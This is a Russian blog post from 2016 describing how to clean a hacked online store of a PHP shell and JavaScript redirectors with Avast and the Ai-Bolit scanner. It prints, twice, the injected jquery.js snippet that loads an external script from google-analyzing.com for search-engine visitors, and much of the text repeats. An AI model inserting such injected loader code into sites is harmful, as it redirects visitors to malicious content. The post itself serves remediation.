Очищаем сайт от вирусов и шелов Айболитом
Категория: Удаление вирусов, Автор: Алексей, Дата публикации: 2016.09.04
Сегодня ко мне обратились за помощью в очистки интернет магазина от вирусов. Неожиданно для одного из сотрудников пришёл отказ в рекламе Google Adwords. В письме указали, что в файле jquery.js прописан подозрительный код.
В первую очередь я с помощью браузера открыл путь к данном файлу, но антивирус Avast никак не среагировал на данный файл, хотя зрительно я уже видел вредоносный код. Затем я соединился по ftp с помощью FileZilla и попробовал открыть файл с помощью программы Notepad++. И вот тут мой антивирус заблокировал доступ к данному файлу.
Чтобы почистить js файл от вируса, мне пришлось на 10 минут отключить AVAST, а затем удалить из файла вредоносные строчки.
Если вы столкнулись с подобной проблемой, удалите следующий код как показано на картинке, или вот эти строки.
var r=document.referrer; var c=document.cookie; r1=0; if ( (r.indexOf('yandex')>0) || (r.indexOf('google')>0) || (r.indexOf('rambler')>0) || (r.indexOf('mail')>0)) { document.cookie = "__ga1=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;"; r1=1; } else {if (c.indexOf('__ga1')==-1){document.cookie = "__ga2=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;";}} if (((c.indexOf('__ga1')>-1) || (r1==1)) && (c.indexOf('__ga2')==-1) ) {document.write(unescape("%3Cscript src='http://google-analyzing.com/urchin.js' type='text/javascript'%3E%3C/script%3E"));}
Бэкап сайта.
Далее соединяемся по ssh доступу, например с помощью утилиты putty и по возможности делаем архив сайта. Для этого достаточно в консоли воспользоваться следующим командой:
*/home/логин/site/public_html - полный путь до главной директории сайта
Бэкап сайта можно и не делать, но мало ли вы удалите что-то важное?
Теперь есть два варианта проверки сайта на вирусы
1. Проверка сайта с помощью php скрипта Ai-Bolit, который ищет различные вирусы а так же php shell.
2. Скачать весь сайт к себе на компьютер и прогнать антивирусом Avast, но первый вариант значительно лучше, удобней, и значительно качественней.
Очистка сайта на локальном компьютере
Сначала я воспользовался вторым способом, поэтому опишу именно его. После того как на компьютер были выкачены все файлы (или архив), а их немного не мало 25 000, я открыл Avast и указал папку с файлами сайта для их проверки на вредоносные скрипты.
После того как Avast выполнил проверку в папке с файлами веб-сайта были обнаружены два скриптовых вируса:
Дальше я зашёл на сервер где лежит сайт, и удалил оба файла.
Файл index.php состоял из следующего кода:
В файле javascript "ui.datepicker_old.js" был вредоносный код в самом низу содержания скрипта. Этот код необходимо удалить!
Очистка сайта от вирусов с помощью Ai-Bolit.
Ftp способ.
1. Загружаем архив со скриптом Айболит на локальный компьютер и распаковываем его.
2. Соединяемся по ftp с помощью клиента FileZilla
3. Распакованные файлы архива размещаем в главную директорию сайта /home/ваш сайт/public_html
4. Запускаем скрипт http://ваш домен/ai-bolit.php
5. Файл отчёта будет создан в главной директории с именем AI-BOLIT-REPORT.html
Если после запуска скрипта отображается чистый белый экран, значит версия php на сервере хостера не подходит для Айболита.
Внимание! Если необходимо проверить все сайты в директории, загружаем скрипт в папку /home/domains/ или /home/ , тогда Ai-Bolit рекурсивно пройдётся по всем папкам, и выдаст отчёт, но как мне кажется лучше проверять по одному домену.
Консольный вариант (SSH)
1. Запускаем программу Putty, или другую консольную программу.
2. Соединяемся с сервером по хосту и паролю.
3. Переходим в главную директорию сайта командой cd /home/ваш логин/ваш сайт/public_html/
4. Загружаем скрипт командой wget http://www.softokno.ru//files/shop_files/20160904_112415ai-bolit.zip
5. Распаковываем zip архив командой unzip 20160904_112415ai-bolit.zip
6. Запускаем скрипт php ai-bolit.php
Для запуска в фоновом режиме используем команду: screen -d -m php ai-bolit.php
7. Ждём пока что скрипт выполнит проверку, и создаст отчёт вида "AI-BOLIT-REPORT.html" на сервере.
Так же обратите внимание, если на вашем сервере установлен php ниже 5.3, Айболит покажет ошибку и не запустит сканирование. В моём случае пришлось выкачивать сайт, и проверять его на своём сервере.
После того как на сервере будет создан файла отчёта, его можно скачать к себе на компьютер и посмотреть обычным браузером (Хром, Файерфокс, и т.д).
В первую очередь стоит обратить внимание на отчёт о "Вредоносных скриптах", ну а дальше либо аккуратно удалять эти файлы, либо чистить ручным способом, как это делаю я .
В первую очередь я с помощью браузера открыл путь к данном файлу, но антивирус Avast никак не среагировал на данный файл, хотя зрительно я уже видел вредоносный код. Затем я соединился по ftp с помощью FileZilla и попробовал открыть файл с помощью программы Notepad++. И вот тут мой антивирус заблокировал доступ к данному файлу.
Чтобы почистить js файл от вируса, мне пришлось на 10 минут отключить AVAST, а затем удалить из файла вредоносные строчки.
Если вы столкнулись с подобной проблемой, удалите следующий код как показано на картинке, или вот эти строки.
var r=document.referrer; var c=document.cookie; r1=0; if ( (r.indexOf('yandex')>0) || (r.indexOf('google')>0) || (r.indexOf('rambler')>0) || (r.indexOf('mail')>0)) { document.cookie = "__ga1=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;"; r1=1; } else {if (c.indexOf('__ga1')==-1){document.cookie = "__ga2=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;";}} if (((c.indexOf('__ga1')>-1) || (r1==1)) && (c.indexOf('__ga2')==-1) ) {document.write(unescape("%3Cscript src='http://google-analyzing.com/urchin.js' type='text/javascript'%3E%3C/script%3E"));}
Бэкап сайта.
Далее соединяемся по ssh доступу, например с помощью утилиты putty и по возможности делаем архив сайта. Для этого достаточно в консоли воспользоваться следующим командой:
tar -cf backup.tar /home/логин/site/public_html
*/home/логин/site/public_html - полный путь до главной директории сайта
Бэкап сайта можно и не делать, но мало ли вы удалите что-то важное?
Теперь есть два варианта проверки сайта на вирусы
1. Проверка сайта с помощью php скрипта Ai-Bolit, который ищет различные вирусы а так же php shell.
2. Скачать весь сайт к себе на компьютер и прогнать антивирусом Avast, но первый вариант значительно лучше, удобней, и значительно качественней.
Очистка сайта на локальном компьютере
Сначала я воспользовался вторым способом, поэтому опишу именно его. После того как на компьютер были выкачены все файлы (или архив), а их немного не мало 25 000, я открыл Avast и указал папку с файлами сайта для их проверки на вредоносные скрипты.
После того как Avast выполнил проверку в папке с файлами веб-сайта были обнаружены два скриптовых вируса:
- Php-Shell-Jv
- Js-Redirector-Fc
Дальше я зашёл на сервер где лежит сайт, и удалил оба файла.
Файл index.php состоял из следующего кода:
В файле javascript "ui.datepicker_old.js" был вредоносный код в самом низу содержания скрипта. Этот код необходимо удалить!
Очистка сайта от вирусов с помощью Ai-Bolit.
Ftp способ.
1. Загружаем архив со скриптом Айболит на локальный компьютер и распаковываем его.
2. Соединяемся по ftp с помощью клиента FileZilla
3. Распакованные файлы архива размещаем в главную директорию сайта /home/ваш сайт/public_html
4. Запускаем скрипт http://ваш домен/ai-bolit.php
5. Файл отчёта будет создан в главной директории с именем AI-BOLIT-REPORT.html
Если после запуска скрипта отображается чистый белый экран, значит версия php на сервере хостера не подходит для Айболита.
Внимание! Если необходимо проверить все сайты в директории, загружаем скрипт в папку /home/domains/ или /home/ , тогда Ai-Bolit рекурсивно пройдётся по всем папкам, и выдаст отчёт, но как мне кажется лучше проверять по одному домену.
Консольный вариант (SSH)
1. Запускаем программу Putty, или другую консольную программу.
2. Соединяемся с сервером по хосту и паролю.
3. Переходим в главную директорию сайта командой cd /home/ваш логин/ваш сайт/public_html/
4. Загружаем скрипт командой wget http://www.softokno.ru//files/shop_files/20160904_112415ai-bolit.zip
5. Распаковываем zip архив командой unzip 20160904_112415ai-bolit.zip
6. Запускаем скрипт php ai-bolit.php
Для запуска в фоновом режиме используем команду: screen -d -m php ai-bolit.php
7. Ждём пока что скрипт выполнит проверку, и создаст отчёт вида "AI-BOLIT-REPORT.html" на сервере.
Так же обратите внимание, если на вашем сервере установлен php ниже 5.3, Айболит покажет ошибку и не запустит сканирование. В моём случае пришлось выкачивать сайт, и проверять его на своём сервере.
После того как на сервере будет создан файла отчёта, его можно скачать к себе на компьютер и посмотреть обычным браузером (Хром, Файерфокс, и т.д).
В первую очередь стоит обратить внимание на отчёт о "Вредоносных скриптах", ну а дальше либо аккуратно удалять эти файлы, либо чистить ручным способом, как это делаю я .
Есть вопросы? Оставьте комментарий
